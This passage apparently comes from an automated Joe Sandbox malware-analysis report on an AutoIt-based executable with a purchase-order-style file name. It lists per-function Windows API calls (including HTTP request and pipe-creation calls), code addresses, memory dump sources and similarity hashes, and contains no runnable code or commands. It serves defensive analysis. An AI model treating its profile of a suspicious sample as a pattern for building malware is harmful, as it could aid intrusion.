                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab6dafa2a8e780bd9416af2acd0d5a58d07b6b6bfcf1382a6565474913d09774
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B113572401148BFEF029F90DC88EEA7FADEF09364F048526BE089A1B0D7719D55DBA4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0043E1C0
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0043E1D1
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043E1D8
                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0043E1E0
                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0043E1F7
                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0043E209
                                                                                                                                                                                                        • Part of subcall function 00439AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00439A05,00000000,00000000,?,00439DDB), ref: 0043A53A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 603618608-0
                                                                                                                                                                                                      • Opcode ID: 100bf36fc0cc57922195767d8ac8667467d734e44cc3b284f00f91914693cef0
                                                                                                                                                                                                      • Instruction ID: c7a5ca771fd91314f3d855d0b2c07d8d13f392a1f48880b11d21432277bd3176
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 100bf36fc0cc57922195767d8ac8667467d734e44cc3b284f00f91914693cef0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D50184B5E01219BFEF10ABA68C45F5EBFB8EB48351F00446AEE04A73D0D6709C00CB64
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0040281D
                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00402825
                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00402830
                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0040283B
                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00402843
                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0040284B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                                                      • Opcode ID: b22e764cd7a84692e8d62c301535e8d2360fde499381a97d8ddbadd5f993477e
                                                                                                                                                                                                      • Instruction ID: 6e9604c49f6eb5af476f9dbc967e5a635b3d3e71b3018c9c8894ab6170c87e60
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b22e764cd7a84692e8d62c301535e8d2360fde499381a97d8ddbadd5f993477e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E016CB0902B5D7DE3008F6A8C85B56FFA8FF15354F00411B915C47941C7F5A864CBE5
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0045B006
                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 0045B115
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0045B298
                                                                                                                                                                                                        • Part of subcall function 00449DC5: VariantInit.OLEAUT32(00000000), ref: 00449E05
                                                                                                                                                                                                        • Part of subcall function 00449DC5: VariantCopy.OLEAUT32(?,?), ref: 00449E0E
                                                                                                                                                                                                        • Part of subcall function 00449DC5: VariantClear.OLEAUT32(?), ref: 00449E1A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                                                                                                      • Opcode ID: 84327044250f59a9cab6804b1ef7f11ab6ee9941cba0601633cc438829fb4262
                                                                                                                                                                                                      • Instruction ID: 52e6914b55ff8660d76304c2970caaf1dc2d4c1ce0d6a1091d09d6c503672bea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84327044250f59a9cab6804b1ef7f11ab6ee9941cba0601633cc438829fb4262
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C917B706083019FCB10DF25C48595BB7E4EF88705F04486EF89A9B3A2DB39E949CB96
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00445438
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?), ref: 00445467
                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00445513
                                                                                                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0044553D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                      • API String ID: 4152858687-4108050209
                                                                                                                                                                                                      • Opcode ID: 01a4ac22a369a3906532e4200640e2ca89e3b4e89d932765b1a56aece9e2e941
                                                                                                                                                                                                      • Instruction ID: 229c3148a9e1a9bfe78ef1b1e5e27531e8706f457ea565323bfac3cc7c02ae31
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01a4ac22a369a3906532e4200640e2ca89e3b4e89d932765b1a56aece9e2e941
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B51E071604701ABEB159F28C841B7BB7E8AB86354F04062FF895D72D3DB78CD448B5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0044027B
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004402B1
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004402C2
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00440344
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                      • String ID: DllGetClassObject
                                                                                                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                                                                                                      • Opcode ID: 79973dfe286d0924063502fe85dda568f87302bef2bff90864adea8305253e84
                                                                                                                                                                                                      • Instruction ID: c3b2b385fa8966dad99c77db0206707ef9e6cc297604f621ef3166624dd72a76
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79973dfe286d0924063502fe85dda568f87302bef2bff90864adea8305253e84
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B418F71600204EFEB05DF54C885B9E7BB9EF44314B1480AEEE099F246D7B8DD50CBA4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00445075
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32 ref: 00445091
                                                                                                                                                                                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 004450D7
                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C1708,00000000), ref: 00445120
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                                                                                                      • Opcode ID: d5a45825af7f55f2a7d769438b1b400d94e08b700d4cff6d26567d240da928d4
                                                                                                                                                                                                      • Instruction ID: db465f5d1fa94ec0c75b63f3553bf801786c42f1ac7b6e4bf5c0d2fbc051ce62
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5a45825af7f55f2a7d769438b1b400d94e08b700d4cff6d26567d240da928d4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4441B1306057419FEB10DF25D885B2BB7E4AF89728F044A2FF85597392D734E800CB6A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00460587
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                      • API String ID: 2358735015-567219261
                                                                                                                                                                                                      • Opcode ID: 0e8fa9936e095e8789758d952d184e543a0e17c637bb92c0b3d6b3c3c7492529
                                                                                                                                                                                                      • Instruction ID: 5a99cc48baeaf98d2ac020c3fe827800d2685473d087967778722ea71df5eec6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e8fa9936e095e8789758d952d184e543a0e17c637bb92c0b3d6b3c3c7492529
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B31A370500116ABCF00EF55CD419EFB3B4FF54318B10862FE826A76D2EB79A956CB98
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0043B88E
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0043B8A1
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 0043B8D1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                      • API String ID: 3850602802-1403004172
                                                                                                                                                                                                      • Opcode ID: 412483d3d58d27abbe8d0b37aa77e3ba7b73ad12b5cbd7d043ce77851ab0f321
                                                                                                                                                                                                      • Instruction ID: 75af9ec50760755e836abce323f7a54ddbaf44f5e0835d8c920f5867198b60a7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 412483d3d58d27abbe8d0b37aa77e3ba7b73ad12b5cbd7d043ce77851ab0f321
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD21D271A00108BEDB08AB65D886EFF7778DF49354F10422EF511A21E1DB7C590A97A8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040522F
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00405283
                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00405293
                                                                                                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00473CB0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                                                                                                      • String ID: Line:
                                                                                                                                                                                                      • API String ID: 1053898822-1585850449
                                                                                                                                                                                                      • Opcode ID: 5a93062e463b5291ae8202b0ac4106f82042ada94cfdc4f28ea77096baa7610a
                                                                                                                                                                                                      • Instruction ID: af1427f6d41ff21884d985d4e629e724e95b45f0675a28509f4e8d353c660326
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a93062e463b5291ae8202b0ac4106f82042ada94cfdc4f28ea77096baa7610a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D319E71508340AED361EB61EC46FEB77D8AF45304F00452FF585A61E2DB78A5488F9E
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00454401
                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00454427
                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00454457
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0045449E
                                                                                                                                                                                                        • Part of subcall function 00455052: GetLastError.KERNEL32(?,?,004543CC,00000000,00000000,00000001), ref: 00455067
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1951874230-3916222277
                                                                                                                                                                                                      • Opcode ID: 2ae2f1a1a1f5d3ddde5fac4bd687caf801070e50ddb0d6f6e3599f60f704cce5
                                                                                                                                                                                                      • Instruction ID: 7aa06a6f42cffd20407d20dfa3cc54c699f161c4d28ccd99cc58e54c7684c86d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ae2f1a1a1f5d3ddde5fac4bd687caf801070e50ddb0d6f6e3599f60f704cce5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C21D0B1540208BFE7119F94CC80EBF77ECEB8975DF10842FF9059A281EA688D499779
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
                                                                                                                                                                                                        • Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
                                                                                                                                                                                                        • Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0046915C
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00469163
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00469178
                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00469180
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                                                                                                      • Opcode ID: d7522572f52e7d85ebcabb9567955eca81081136ae215111d044ca7cb5f6ca0d
                                                                                                                                                                                                      • Instruction ID: 16967437a8ff6b7649d04cfe7d5b64226969d6153742429de35e53786cdd0d82
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7522572f52e7d85ebcabb9567955eca81081136ae215111d044ca7cb5f6ca0d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C218371600206BBFF104E649C44EFB37ADEF56364F20461AF95492290E7B5DC42A769
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00449588
                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004495B9
                                                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 004495CB
                                                                                                                                                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00449605
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
